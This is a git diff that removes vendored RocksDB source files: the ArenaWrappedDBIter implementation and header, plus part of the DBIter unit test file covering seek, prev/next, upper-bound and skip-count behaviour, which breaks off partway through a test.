-inline void ArenaWrappedDBIter::Next() { db_iter_->Next(); }
-inline void ArenaWrappedDBIter::Prev() { db_iter_->Prev(); }
-inline Slice ArenaWrappedDBIter::key() const { return db_iter_->key(); }
-inline Slice ArenaWrappedDBIter::value() const { return db_iter_->value(); }
-inline Status ArenaWrappedDBIter::status() const { return db_iter_->status(); }
-bool ArenaWrappedDBIter::IsBlob() const { return db_iter_->IsBlob(); }
-inline Status ArenaWrappedDBIter::GetProperty(std::string prop_name,
-                                              std::string* prop) {
-  if (prop_name == "rocksdb.iterator.super-version-number") {
-    // First try to pass the value returned from inner iterator.
-    if (!db_iter_->GetProperty(prop_name, prop).ok()) {
-      *prop = ToString(sv_number_);
-    }
-    return Status::OK();
-  }
-  return db_iter_->GetProperty(prop_name, prop);
-}
-
-void ArenaWrappedDBIter::Init(Env* env, const ReadOptions& read_options,
-                              const ImmutableCFOptions& cf_options,
-                              const SequenceNumber& sequence,
-                              uint64_t max_sequential_skip_in_iteration,
-                              uint64_t version_number, bool allow_blob) {
-  auto mem = arena_.AllocateAligned(sizeof(DBIter));
-  db_iter_ = new (mem)
-      DBIter(env, read_options, cf_options, cf_options.user_comparator, nullptr,
-             sequence, true, max_sequential_skip_in_iteration, allow_blob);
-  sv_number_ = version_number;
-}
-
-Status ArenaWrappedDBIter::Refresh() {
-  if (cfd_ == nullptr || db_impl_ == nullptr) {
-    return Status::NotSupported("Creating renew iterator is not allowed.");
-  }
-  assert(db_iter_ != nullptr);
-  SequenceNumber latest_seq = db_impl_->GetLatestSequenceNumber();
-  uint64_t cur_sv_number = cfd_->GetSuperVersionNumber();
-  if (sv_number_ != cur_sv_number) {
-    Env* env = db_iter_->env();
-    db_iter_->~DBIter();
-    arena_.~Arena();
-    new (&arena_) Arena();
-
-    SuperVersion* sv = cfd_->GetReferencedSuperVersion(db_impl_->mutex());
-    Init(env, read_options_, *(cfd_->ioptions()), latest_seq,
-         sv->mutable_cf_options.max_sequential_skip_in_iterations,
-         cur_sv_number, allow_blob_);
-
-    InternalIterator* internal_iter = db_impl_->NewInternalIterator(
-        read_options_, cfd_, sv, &arena_, db_iter_->GetRangeDelAggregator());
-    SetIterUnderDBIter(internal_iter);
-  } else {
-    db_iter_->set_sequence(latest_seq);
-    db_iter_->set_valid(false);
-  }
-  return Status::OK();
-}
-
-ArenaWrappedDBIter* NewArenaWrappedDbIterator(
-    Env* env, const ReadOptions& read_options,
-    const ImmutableCFOptions& cf_options, const SequenceNumber& sequence,
-    uint64_t max_sequential_skip_in_iterations, uint64_t version_number,
-    DBImpl* db_impl, ColumnFamilyData* cfd, bool allow_blob) {
-  ArenaWrappedDBIter* iter = new ArenaWrappedDBIter();
-  iter->Init(env, read_options, cf_options, sequence,
-             max_sequential_skip_in_iterations, version_number, allow_blob);
-  if (db_impl != nullptr && cfd != nullptr) {
-    iter->StoreRefreshInfo(read_options, db_impl, cfd, allow_blob);
-  }
-
-  return iter;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_iter.h b/thirdparty/rocksdb/db/db_iter.h
deleted file mode 100644
index 26fcd44..0000000
--- a/thirdparty/rocksdb/db/db_iter.h
+++ /dev/null
@@ -1,105 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <stdint.h>
-#include <string>
-#include "db/db_impl.h"
-#include "db/dbformat.h"
-#include "db/range_del_aggregator.h"
-#include "options/cf_options.h"
-#include "rocksdb/db.h"
-#include "rocksdb/iterator.h"
-#include "util/arena.h"
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-class Arena;
-class DBIter;
-class InternalIterator;
-
-// Return a new iterator that converts internal keys (yielded by
-// "*internal_iter") that were live at the specified "sequence" number
-// into appropriate user keys.
-extern Iterator* NewDBIterator(Env* env, const ReadOptions& read_options,
-                               const ImmutableCFOptions& cf_options,
-                               const Comparator* user_key_comparator,
-                               InternalIterator* internal_iter,
-                               const SequenceNumber& sequence,
-                               uint64_t max_sequential_skip_in_iterations,
-                               bool allow_blob = false);
-
-// A wrapper iterator which wraps DB Iterator and the arena, with which the DB
-// iterator is supposed be allocated. This class is used as an entry point of
-// a iterator hierarchy whose memory can be allocated inline. In that way,
-// accessing the iterator tree can be more cache friendly. It is also faster
-// to allocate.
-class ArenaWrappedDBIter : public Iterator {
- public:
-  virtual ~ArenaWrappedDBIter();
-
-  // Get the arena to be used to allocate memory for DBIter to be wrapped,
-  // as well as child iterators in it.
-  virtual Arena* GetArena() { return &arena_; }
-  virtual RangeDelAggregator* GetRangeDelAggregator();
-
-  // Set the internal iterator wrapped inside the DB Iterator. Usually it is
-  // a merging iterator.
-  virtual void SetIterUnderDBIter(InternalIterator* iter);
-  virtual bool Valid() const override;
-  virtual void SeekToFirst() override;
-  virtual void SeekToLast() override;
-  virtual void Seek(const Slice& target) override;
-  virtual void SeekForPrev(const Slice& target) override;
-  virtual void Next() override;
-  virtual void Prev() override;
-  virtual Slice key() const override;
-  virtual Slice value() const override;
-  virtual Status status() const override;
-  virtual Status Refresh() override;
-  bool IsBlob() const;
-
-  virtual Status GetProperty(std::string prop_name, std::string* prop) override;
-
-  void Init(Env* env, const ReadOptions& read_options,
-            const ImmutableCFOptions& cf_options,
-            const SequenceNumber& sequence,
-            uint64_t max_sequential_skip_in_iterations, uint64_t version_number,
-            bool allow_blob);
-
-  void StoreRefreshInfo(const ReadOptions& read_options, DBImpl* db_impl,
-                        ColumnFamilyData* cfd, bool allow_blob) {
-    read_options_ = read_options;
-    db_impl_ = db_impl;
-    cfd_ = cfd;
-    allow_blob_ = allow_blob;
-  }
-
- private:
-  DBIter* db_iter_;
-  Arena arena_;
-  uint64_t sv_number_;
-  ColumnFamilyData* cfd_ = nullptr;
-  DBImpl* db_impl_ = nullptr;
-  ReadOptions read_options_;
-  bool allow_blob_ = false;
-};
-
-// Generate the arena wrapped iterator class.
-// `db_impl` and `cfd` are used for reneweal. If left null, renewal will not
-// be supported.
-extern ArenaWrappedDBIter* NewArenaWrappedDbIterator(
-    Env* env, const ReadOptions& read_options,
-    const ImmutableCFOptions& cf_options, const SequenceNumber& sequence,
-    uint64_t max_sequential_skip_in_iterations, uint64_t version_number,
-    DBImpl* db_impl = nullptr, ColumnFamilyData* cfd = nullptr,
-    bool allow_blob = false);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_iter_test.cc b/thirdparty/rocksdb/db/db_iter_test.cc
deleted file mode 100644
index 6db3b4a..0000000
--- a/thirdparty/rocksdb/db/db_iter_test.cc
+++ /dev/null
@@ -1,2804 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <string>
-#include <vector>
-#include <algorithm>
-#include <utility>
-
-#include "db/db_iter.h"
-#include "db/dbformat.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/options.h"
-#include "rocksdb/perf_context.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/statistics.h"
-#include "table/iterator_wrapper.h"
-#include "table/merging_iterator.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-static uint64_t TestGetTickerCount(const Options& options,
-                                   Tickers ticker_type) {
-  return options.statistics->getTickerCount(ticker_type);
-}
-
-class TestIterator : public InternalIterator {
- public:
-  explicit TestIterator(const Comparator* comparator)
-      : initialized_(false),
-        valid_(false),
-        sequence_number_(0),
-        iter_(0),
-        cmp(comparator) {}
-
-  void AddPut(std::string argkey, std::string argvalue) {
-    Add(argkey, kTypeValue, argvalue);
-  }
-
-  void AddDeletion(std::string argkey) {
-    Add(argkey, kTypeDeletion, std::string());
-  }
-
-  void AddSingleDeletion(std::string argkey) {
-    Add(argkey, kTypeSingleDeletion, std::string());
-  }
-
-  void AddMerge(std::string argkey, std::string argvalue) {
-    Add(argkey, kTypeMerge, argvalue);
-  }
-
-  void Add(std::string argkey, ValueType type, std::string argvalue) {
-    Add(argkey, type, argvalue, sequence_number_++);
-  }
-
-  void Add(std::string argkey, ValueType type, std::string argvalue,
-           size_t seq_num, bool update_iter = false) {
-    valid_ = true;
-    ParsedInternalKey internal_key(argkey, seq_num, type);
-    data_.push_back(
-        std::pair<std::string, std::string>(std::string(), argvalue));
-    AppendInternalKey(&data_.back().first, internal_key);
-    if (update_iter && valid_ && cmp.Compare(data_.back().first, key()) < 0) {
-      // insert a key smaller than current key
-      Finish();
-      // data_[iter_] is not anymore the current element of the iterator.
-      // Increment it to reposition it to the right position.
-      iter_++;
-    }
-  }
-
-  // should be called before operations with iterator
-  void Finish() {
-    initialized_ = true;
-    std::sort(data_.begin(), data_.end(),
-              [this](std::pair<std::string, std::string> a,
-                     std::pair<std::string, std::string> b) {
-      return (cmp.Compare(a.first, b.first) < 0);
-    });
-  }
-
-  virtual bool Valid() const override {
-    assert(initialized_);
-    return valid_;
-  }
-
-  virtual void SeekToFirst() override {
-    assert(initialized_);
-    valid_ = (data_.size() > 0);
-    iter_ = 0;
-  }
-
-  virtual void SeekToLast() override {
-    assert(initialized_);
-    valid_ = (data_.size() > 0);
-    iter_ = data_.size() - 1;
-  }
-
-  virtual void Seek(const Slice& target) override {
-    assert(initialized_);
-    SeekToFirst();
-    if (!valid_) {
-      return;
-    }
-    while (iter_ < data_.size() &&
-           (cmp.Compare(data_[iter_].first, target) < 0)) {
-      ++iter_;
-    }
-
-    if (iter_ == data_.size()) {
-      valid_ = false;
-    }
-  }
-
-  virtual void SeekForPrev(const Slice& target) override {
-    assert(initialized_);
-    SeekForPrevImpl(target, &cmp);
-  }
-
-  virtual void Next() override {
-    assert(initialized_);
-    if (data_.empty() || (iter_ == data_.size() - 1)) {
-      valid_ = false;
-    } else {
-      ++iter_;
-    }
-  }
-
-  virtual void Prev() override {
-    assert(initialized_);
-    if (iter_ == 0) {
-      valid_ = false;
-    } else {
-      --iter_;
-    }
-  }
-
-  virtual Slice key() const override {
-    assert(initialized_);
-    return data_[iter_].first;
-  }
-
-  virtual Slice value() const override {
-    assert(initialized_);
-    return data_[iter_].second;
-  }
-
-  virtual Status status() const override {
-    assert(initialized_);
-    return Status::OK();
-  }
-
-  virtual bool IsKeyPinned() const override { return true; }
-  virtual bool IsValuePinned() const override { return true; }
-
- private:
-  bool initialized_;
-  bool valid_;
-  size_t sequence_number_;
-  size_t iter_;
-
-  InternalKeyComparator cmp;
-  std::vector<std::pair<std::string, std::string>> data_;
-};
-
-class DBIteratorTest : public testing::Test {
- public:
-  Env* env_;
-
-  DBIteratorTest() : env_(Env::Default()) {}
-};
-
-TEST_F(DBIteratorTest, DBIteratorPrevNext) {
-  Options options;
-  ImmutableCFOptions cf_options = ImmutableCFOptions(options);
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddDeletion("a");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddPut("a", "val_a");
-
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->Finish();
-
-    ReadOptions ro;
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "val_b");
-
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-    db_iter->Next();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "val_b");
-
-    db_iter->Next();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-  // Test to check the SeekToLast() with iterate_upper_bound not set
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->Finish();
-
-    ReadOptions ro;
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-  }
-
-  // Test to check the SeekToLast() with iterate_upper_bound set
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddPut("d", "val_d");
-    internal_iter->AddPut("e", "val_e");
-    internal_iter->AddPut("f", "val_f");
-    internal_iter->Finish();
-
-    Slice prefix("d");
-
-    ReadOptions ro;
-    ro.iterate_upper_bound = &prefix;
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-
-    db_iter->Next();
-    ASSERT_TRUE(!db_iter->Valid());
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-  }
-  // Test to check the SeekToLast() iterate_upper_bound set to a key that
-  // is not Put yet
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddPut("d", "val_d");
-    internal_iter->Finish();
-
-    Slice prefix("z");
-
-    ReadOptions ro;
-    ro.iterate_upper_bound = &prefix;
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "d");
-
-    db_iter->Next();
-    ASSERT_TRUE(!db_iter->Valid());
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "d");
-
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-  }
-  // Test to check the SeekToLast() with iterate_upper_bound set to the
-  // first key
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->Finish();
-
-    Slice prefix("a");
-
-    ReadOptions ro;
-    ro.iterate_upper_bound = &prefix;
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-  // Test case to check SeekToLast with iterate_upper_bound set
-  // (same key put may times - SeekToLast should start with the
-  // maximum sequence id of the upper bound)
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->Finish();
-
-    Slice prefix("c");
-
-    ReadOptions ro;
-    ro.iterate_upper_bound = &prefix;
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      7, options.max_sequential_skip_in_iterations));
-
-    SetPerfLevel(kEnableCount);
-    ASSERT_TRUE(GetPerfLevel() == kEnableCount);
-
-    get_perf_context()->Reset();
-    db_iter->SeekToLast();
-
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(static_cast<int>(get_perf_context()->internal_key_skipped_count), 7);
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-
-    SetPerfLevel(kDisable);
-  }
-  // Test to check the SeekToLast() with the iterate_upper_bound set
-  // (Checking the value of the key which has sequence ids greater than
-  // and less that the iterator's sequence id)
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-
-    internal_iter->AddPut("a", "val_a1");
-    internal_iter->AddPut("a", "val_a2");
-    internal_iter->AddPut("b", "val_b1");
-    internal_iter->AddPut("c", "val_c1");
-    internal_iter->AddPut("c", "val_c2");
-    internal_iter->AddPut("c", "val_c3");
-    internal_iter->AddPut("b", "val_b2");
-    internal_iter->AddPut("d", "val_d1");
-    internal_iter->Finish();
-
-    Slice prefix("c");
-
-    ReadOptions ro;
-    ro.iterate_upper_bound = &prefix;
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      4, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "val_b1");
-  }
-
-  // Test to check the SeekToLast() with the iterate_upper_bound set to the
-  // key that is deleted
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->Finish();
-
-    Slice prefix("a");
-
-    ReadOptions ro;
-    ro.iterate_upper_bound = &prefix;
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-  // Test to check the SeekToLast() with the iterate_upper_bound set
-  // (Deletion cases)
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->AddDeletion("b");
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->Finish();
-
-    Slice prefix("c");
-
-    ReadOptions ro;
-    ro.iterate_upper_bound = &prefix;
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-
-    db_iter->Next();
-    ASSERT_TRUE(!db_iter->Valid());
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-  }
-  // Test to check the SeekToLast() with iterate_upper_bound set
-  // (Deletion cases - Lot of internal keys after the upper_bound
-  // is deleted)
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->AddDeletion("c");
-    internal_iter->AddDeletion("d");
-    internal_iter->AddDeletion("e");
-    internal_iter->AddDeletion("f");
-    internal_iter->AddDeletion("g");
-    internal_iter->AddDeletion("h");
-    internal_iter->Finish();
-
-    Slice prefix("c");
-
-    ReadOptions ro;
-    ro.iterate_upper_bound = &prefix;
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      7, options.max_sequential_skip_in_iterations));
-
-    SetPerfLevel(kEnableCount);
-    ASSERT_TRUE(GetPerfLevel() == kEnableCount);
-
-    get_perf_context()->Reset();
-    db_iter->SeekToLast();
-
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(static_cast<int>(get_perf_context()->internal_delete_skipped_count), 1);
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-
-    SetPerfLevel(kDisable);
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddDeletion("a");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddDeletion("a");
-    internal_iter->AddPut("a", "val_a");
-
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->Finish();
-
-    ReadOptions ro;
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-
-    db_iter->SeekToFirst();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-    db_iter->Next();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "val_b");
-
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "a");
-    ASSERT_EQ(db_iter->value().ToString(), "val_a");
-
-    db_iter->Prev();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("b", "val_b");
-    internal_iter->Finish();
-
-    ReadOptions ro;
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      2, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "val_b");
-
-    db_iter->Next();
-    ASSERT_TRUE(!db_iter->Valid());
-
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "val_b");
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("a", "val_a");
-    internal_iter->AddPut("a", "val_a");
-
-    internal_iter->AddPut("b", "val_b");
-
-    internal_iter->AddPut("c", "val_c");
-    internal_iter->Finish();
-
-    ReadOptions ro;
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      10, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "val_c");
-
-    db_iter->Prev();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "b");
-    ASSERT_EQ(db_iter->value().ToString(), "val_b");
-
-    db_iter->Next();
-    ASSERT_TRUE(db_iter->Valid());
-    ASSERT_EQ(db_iter->key().ToString(), "c");
-    ASSERT_EQ(db_iter->value().ToString(), "val_c");
-  }
-}
-
-TEST_F(DBIteratorTest, DBIteratorEmpty) {
-  Options options;
-  ImmutableCFOptions cf_options = ImmutableCFOptions(options);
-  ReadOptions ro;
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      0, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToLast();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-
-  {
-    TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-    internal_iter->Finish();
-
-    std::unique_ptr<Iterator> db_iter(
-        NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter,
-                      0, options.max_sequential_skip_in_iterations));
-    db_iter->SeekToFirst();
-    ASSERT_TRUE(!db_iter->Valid());
-  }
-}
-
-TEST_F(DBIteratorTest, DBIteratorUseSkipCountSkips) {
-  ReadOptions ro;
-  Options options;
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-
-  TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-  for (size_t i = 0; i < 200; ++i) {
-    internal_iter->AddPut("a", "a");
-    internal_iter->AddPut("b", "b");
-    internal_iter->AddPut("c", "c");
-  }
-  internal_iter->Finish();
-
-  std::unique_ptr<Iterator> db_iter(NewDBIterator(
-      env_, ro, ImmutableCFOptions(options), BytewiseComparator(),
-      internal_iter, 2, options.max_sequential_skip_in_iterations));
-  db_iter->SeekToLast();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "c");
-  ASSERT_EQ(db_iter->value().ToString(), "c");
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION), 1u);
-
-  db_iter->Prev();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "b");
-  ASSERT_EQ(db_iter->value().ToString(), "b");
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION), 2u);
-
-  db_iter->Prev();
-  ASSERT_TRUE(db_iter->Valid());
-  ASSERT_EQ(db_iter->key().ToString(), "a");
-  ASSERT_EQ(db_iter->value().ToString(), "a");
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION), 3u);
-
-  db_iter->Prev();
-  ASSERT_TRUE(!db_iter->Valid());
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION), 3u);
-}
-
-TEST_F(DBIteratorTest, DBIteratorUseSkip) {
-  ReadOptions ro;
-  Options options;
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-  ImmutableCFOptions cf_options = ImmutableCFOptions(options);
-
-  {
-    for (size_t i = 0; i < 200; ++i) {
-      TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-      internal_iter->AddMerge("b", "merge_1");
-      internal_iter->AddMerge("a", "merge_2");
-      for (size_t k = 0; k < 200; ++k) {
-        internal_iter->AddPut("c", ToString(k));
-      }
-      internal_iter->Finish();
-
-      options.statistics = rocksdb::CreateDBStatistics();
-      std::unique_ptr<Iterator> db_iter(NewDBIterator(
-          env_, ro, cf_options, BytewiseComparator(), internal_iter, i + 2,
-          options.max_sequential_skip_in_iterations));
-      db_iter->SeekToLast();
-      ASSERT_TRUE(db_iter->Valid());
-
-      ASSERT_EQ(db_iter->key().ToString(), "c");
-      ASSERT_EQ(db_iter->value().ToString(), ToString(i));
-      db_iter->Prev();
-      ASSERT_TRUE(db_iter->Valid());
-
-      ASSERT_EQ(db_iter->key().ToString(), "b");
-      ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-      db_iter->Prev();
-      ASSERT_TRUE(db_iter->Valid());
-
-      ASSERT_EQ(db_iter->key().ToString(), "a");
-      ASSERT_EQ(db_iter->value().ToString(), "merge_2");
-      db_iter->Prev();
-
-      ASSERT_TRUE(!db_iter->Valid());
-    }
-  }
-
-  {
-    for (size_t i = 0; i < 200; ++i) {
-      TestIterator* internal_iter = new TestIterator(BytewiseComparator());
-      internal_iter->AddMerge("b", "merge_1");
-      internal_iter->AddMerge("a", "merge_2");
-      for (size_t k = 0; k < 200; ++k) {
-        internal_iter->AddDeletion("c");
-      }
-      internal_iter->AddPut("c", "200");
-      internal_iter->Finish();
-
-      std::unique_ptr<Iterator> db_iter(NewDBIterator(
-          env_, ro, cf_options, BytewiseComparator(), internal_iter, i + 2,
-          options.max_sequential_skip_in_iterations));
-      db_iter->SeekToLast();
-      ASSERT_TRUE(db_iter->Valid());
-
-      ASSERT_EQ(db_iter->key().ToString(), "b");
-      ASSERT_EQ(db_iter->value().ToString(), "merge_1");
-      db_iter->Prev();
-      ASSERT_TRUE(db_iter->Valid());
-
-      ASSERT_EQ(db_iter->key().ToString(), "a");
-      ASSERT_EQ(db_iter->value().ToString(), "merge_2");
-      db_iter->Prev();
-
-      ASSERT_TRUE(!db_iter->Valid());
-    }
-
-    {
-      TestIterator* internal_iter = new TestIterator(BytewiseComparator());
